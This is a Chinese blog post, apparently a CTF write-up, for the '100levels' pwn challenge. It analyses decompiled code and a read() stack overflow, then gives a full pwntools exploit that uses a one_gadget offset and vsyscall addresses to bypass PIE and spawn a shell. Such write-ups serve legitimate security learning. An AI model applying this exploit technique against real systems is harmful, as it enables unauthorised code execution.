CTF-PWN100levels(vsyscall利用)

最新推荐文章于 2024-02-19 14:15:00 发布
最新推荐文章于 2024-02-19 14:15:00 发布
阅读量738 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/102827841
版权

程序流程&漏洞分析

checksec:

supergate@ubuntu:~/Desktop/Pwn$ checksec pwn
[*] '/home/supergate/Desktop/Pwn/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

开启了PIE,这对我们的地址泄露造成困难

主要实现了两个流程:
Hint:

int hint()
{
  signed __int64 v1; // [rsp+8h] [rbp-108h]
  int v2; // [rsp+10h] [rbp-100h]
  __int16 v3; // [rsp+14h] [rbp-FCh]

  if ( unk_55C634EFB08C )
  {
    sprintf((char *)&v1, "Hint: %p\n", &system, &system);
  }
  else
  {
    v1 = 'N NWP ON';
    v2 = 'UF O';
    v3 = 'N';
  }
  return puts((const char *)&v1);
}

可以发现该流程先判断.bss段上的一个地方的值,如果不为零则可以达到泄露system地址的效果
当然在后续调试和分析中我们发现这个地方没有办法直接泄露,但是按tab看汇编后可以发现,system的地址会被直接存在栈上[esp+10h]的位置上,在后续的控制流中有可能进行利用

Go:

int go()
{
  int v1; // ST0C_4
  __int64 v2; // [rsp+0h] [rbp-120h]
  __int64 v3; // [rsp+0h] [rbp-120h]
  int v4; // [rsp+8h] [rbp-118h]
  __int64 System_addr; // [rsp+10h] [rbp-110h]
  signed __int64 System_addra; // [rsp+10h] [rbp-110h]
  signed __int64 v7; // [rsp+18h] [rbp-108h]
  __int64 v8; // [rsp+20h] [rbp-100h]

  puts("How many levels?");
  v2 = readin();
  if ( v2 > 0 )
    System_addr = v2;
  else
    puts("Coward");
  puts("Any more?");
  v3 = readin();
  System_addra = System_addr + v3;
  if ( System_addra > 0 )
  {
    if ( System_addra <= 99 )
    {
      v7 = System_addra;
    }
    else
    {
      puts("You are being a real man.");
      v7 = 100LL;
    }
    puts("Let's go!'");
    v4 = time(0LL);
    if ( (unsigned int)sub_55C634CF9E43(v7) != 0 )
    {
      v1 = time(0LL);
      sprintf((char *)&v8, "Great job! You finished %d levels in %d seconds\n", v7, (unsigned int)(v1 - v4), v3);
      puts((const char *)&v8);
    }
    else
    {
      puts("You failed.");
    }
    exit(0);
  }
  return puts("Coward Coward Coward Coward Coward");
}

可以看到有两个变量是改了名的——这就是上面分析时所说的可以利用的地方。根据栈平衡,本函数中的[esp+10h]的地址仍然存的是system的地址。v2<=0的时候会跳过对[esp+10h]的初始化,使得这个地方的值不变。
one_gadget搜一下库:

supergate@ubuntu:~/Desktop/Pwn$ one_gadget libc.so
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xef6c4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf0567 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

发现执行shell的地方存在libc.so偏移为0x4526a,因此可以通过go函数的v3变量来修改system_addr的偏移,使得[esp+10h]这个地址内存的是execve("/bin/sh")的地址

sub_55C634CF9E43

_BOOL8 __fastcall sub_55C634CF9E43(signed int a1)
{
  int v2; // eax
  __int64 v3; // rax
  __int64 buf; // [rsp+10h] [rbp-30h]
  __int64 v5; // [rsp+18h] [rbp-28h]
  __int64 v6; // [rsp+20h] [rbp-20h]
  __int64 v7; // [rsp+28h] [rbp-18h]
  unsigned int v8; // [rsp+34h] [rbp-Ch]
  unsigned int v9; // [rsp+38h] [rbp-8h]
  unsigned int v10; // [rsp+3Ch] [rbp-4h]

  buf = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  if ( !a1 )
    return 1LL;
  if ( (unsigned int)sub_55C634CF9E43(a1 - 1) == 0 )
    return 0LL;
  v10 = rand() % a1;
  v2 = rand();
  v9 = v2 % a1;
  v8 = v2 % a1 * v10;
  puts("====================================================");
  printf("Level %d\n", (unsigned int)a1);
  printf("Question: %d * %d = ? Answer:", v10, v9);
  read(0, &buf, 0x400uLL);
  v3 = strtol((const char *)&buf, 0LL, 10);
  return v3 == v8;
}

是一个递归调用函数。
很容易发现read函数有很大的缓冲区溢出量。
由于也没有canary,因此可以直接构造返回地址劫持控制流。
可以经过调试发现ret的地址在buf偏移0x38的地方,而上面提到的execve("/bin/sh"),由于存在[esp+10h]处,所以偏移处应该在0x38+8*3,因此在ret之后还应绕过剩下的这三个偏移。
由于开启了PIE,所以ROP链的构造比较困难,这里考虑使用vsyscall来跳过这三个地址,具体的原理可搜一下相关信息。

exp

from pwn import *
from LibcSearcher import *

context(log_level='debug')
#p=process("./pwn")
p=remote("111.198.29.45",48741)
e=ELF("./libc.so")

system_libc=e.symbols['system']
exev_libc=0x4526a
vsyscall=0xffffffffff600000
offset=exev_libc-system_libc
print "offset  ====> "+hex(offset)

p.recvuntil("Choice:\n")
p.sendline("2")

p.recvuntil("Choice:\n")
p.sendline("1")
p.recvuntil("How many levels?\n")
p.sendline("0")
p.recvuntil("Any more?\n")
p.sendline(str(offset))

for i in range(99):
    p.recvuntil("Question: ")
    a=int(p.recvuntil(" ")[:-1])
    p.recvuntil("* ")
    b=int(p.recvuntil(" ")[:-1])
    p.recvuntil("Answer:")
    p.sendline(str(a*b))

payload='a'*0x38+p64(vsyscall)*3
p.recvuntil("Answer:")
p.send(payload)
p.interactive()
SuperGate
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1521
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
xctf 100levels
doudoudedi
11-20 264
直接用vsyscall的地址不会发生改变通过栈的结构分布发现返回地址+24byte之后便是system_addr将其改为execve(’/bin/sh’)然后跳到上面即可 from pwn import * local=1 if local==1: p=process('./100levels') elf=ELF('./100levels') libc=ELF('./libc.so') el...
1000levels-vsyscall
playmaker的博客
08-11 324
1000levels-vsyscall 题目是一个64位的程序 具体保护如下 程序主要分为两部分,分别为go部分和hint部分。 首先先看简单的hint部分 int hint() { signed __int64 v1; // [rsp+8h] [rbp-108h] int v2; // [rsp+10h] [rbp-100h] __int16 v3; // [rsp+14h] [r...
XCTF 3rd-BCTF-2017——100levels
05-08 388
64位程序,没开canary,但开了PIE  #爆破 #vsyscall 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 5 set(); 6 put_logo(); 7 while ( 1 ) ...
RE-CTF_100
iris的博客
10-11 927
安装并打开apk之后,发现题目为爬到指定的楼层然后才能显示FLAG: 先使用JEB2反编译apk查看逻辑: 爬一层楼的点击事件:首先已爬楼层数+1并更新已爬楼层数,紧接着判断是否达到要爬楼层数,如果达到,就设置爬到了,看FLAG的点击结果为true。 最终看到FLAG按钮的点击事件,可以看到最终的返回FLAG方法在native层实现。我们可以使用IDA进行分析。 onCreate方法的实现...
vsyscall滑动利用
FUCKING12的博客
10-18 214
vsyscall滑动利用
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
Elieen:使用JSON配置CTF-Pwn中的Docker容器.zip
最新发布
06-19
pwn_dockers:pwn类配置 project_path:[nullable] docker相关资源的文件夹,也是最后Dockerfile生成的文件夹 filename:二进制文件名字 docker_username:docker中运行程序的用户名 image_name:镜像文件名称,...
Linux内核深入理解系统调用(2):vsyscall 和 vDSO 以及程序是如何运行的(execve)
RToax
03-29 2296
Linux内核深入理解系统调用(2) vsyscall 和 vDSO 以及程序是如何运行的(execve) rtoax 2021年3月 1. vsyscalls 和 vDSO 这是讲解 Linux 内核中系统调用章节的第三部分,前一节讨论了用户空间应用程序发起的系统调用的准备工作及系统调用的处理过程。在这一节将讨论两个与系统调用十分相似的概念,这两个概念是vsyscall 和 vdso。 我们已经了解什么是系统调用。这是 Linux 内核一种特殊的运行机制,使得用户空间的应用程序可以请求,像写入文件和
linux kernel pwn学习之劫持vdso
seaaseesa的博客
03-06 2318
Hijack vdso VDSO就是Virtual Dynamic Shared Object,是内核提供的虚拟的.so,这个.so文件不在磁盘上,而是在内核里头。内核把包含某.so的内存页在程序启动的时候映射入其内存空间,对应的程序就可以当普通的.so来使用里面的函数。Vdso里面封装了这几个函数,其作用主要是加快对于某些对速度要求很高的系统调用,更多详细信息可以查看https://blog....
使用vsyscall系统调用
weixin_39094034的博客
01-17 334
vsyscall相较于普通的通过INT 80中断完成的系统调用要更快,因此在对于精度要求很高或者时延要求极低的系统调用适合用vsyscall来实现,但是有一个缺点是vsyscall的系统调用不一定有libc的包裹函数,因此使用上比较复杂,但是内核已经为我们映射好了这些vsyscall到线程的地址空间中。废话少说,看代码: /* *Copyright (c) 2013 GuZheng * Author: GuZheng <cengku@gmail.com> * Demo of how t
2018 10 18 pwn的学习0x7 保护和堆
startr4ck
10-18 498
什么是relro保护? relro 是一种用于加强对 binary 数据段的保护的技术。relro 分为 partial relro 和 full relro 设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号,从而减少对GOT(Global Offset Table)攻击。     Partial RELRO         现在gcc 默认编译就是 partial relro(很久...
linux 系统调用,linux系统调用以及vsyscall、vdso
weixin_29536515的博客
04-28 521
linux系统调用以及vsyscall、vdso首页 计算机相关 二进制-ELF linux系统调用以及vsyscall、vdso系统调用现代操作系统的进程空间分为用户空间(user space)与内核空间(kernel space)。通常程序运行在用户空间中,当涉及一些敏感指令执行的时候,比如与硬件交互的操作,需要切换到内核空间,相关指令执行完毕后再返回用户空间继续执行。系统调用(syscall...
【Linux 内核源码分析】虚拟内存地址空间
C/C++Linux、音视频、DPDK
02-19 1190
在现代操作系统中,每个进程被分配了独享的虚拟内存地址空间。这个地址空间可以视为一维线性空间,由多个连续的内存页组成。初始时,操作系统会将整个虚拟地址空间分成几个不同的区域,每个区域用于特定的目的。在32位模式下,虚拟地址空间通常被限制在4GB范围内。而在64位模式下,则能够支持更大的地址空间范围。
【picoCTF2022】Pwn部分
Sparks_Pion的博客
03-29 690
basic-file-exploit if ((entry_number = strtol(entry, NULL, 10)) == 0) { puts(flag); fseek(stdin, 0, SEEK_END); exit(0); } 查询 0 号就可以了 ┌──(root㉿LAPTOP-Sparks)-[/tmp] └─# nc saturn.picoctf.net 52682 Hi, welcome to my echo chamber! Type '1' to ent
[pwn]ROP:灵活运用syscall
Breeze的博客
08-26 9935
灵活运用syscall 遇到了一个程序并不复杂,但利用却很麻烦的题目,Recho题目详细writeup,题目地址:Recho 按照惯例,查看安全策略: 基本没啥安全策略,然后查看程序逻辑,程序很短,就一个main: 很容易就找到溢出点,大体逻辑就是,先输入一个数,小于15会被认为是16,然后再输入一串字符串,程序会将前x(刚输入的数字)个字符拷贝到buf中,这里没有上限,所以存在溢出。但问题是...
攻防世界 Pwn 进阶 第二页
yongbaoii的博客
02-18 658
00 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆。 攻防世界 Pwn 新手 攻防世界 Pwn 进阶 第一页 01 4-ReeHY-main-100 超详细的wp1 超详细的wp2 03 format2 栈迁移的两种作用之一:栈溢出太小,进行栈迁移从而能够写入更多shellcode,进行更多操作。 栈迁移一篇搞定 有个陌生的函数。 C 库函数 void *memcpy(void *str1, const void *str2, size_t n) 从存储区 str2
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值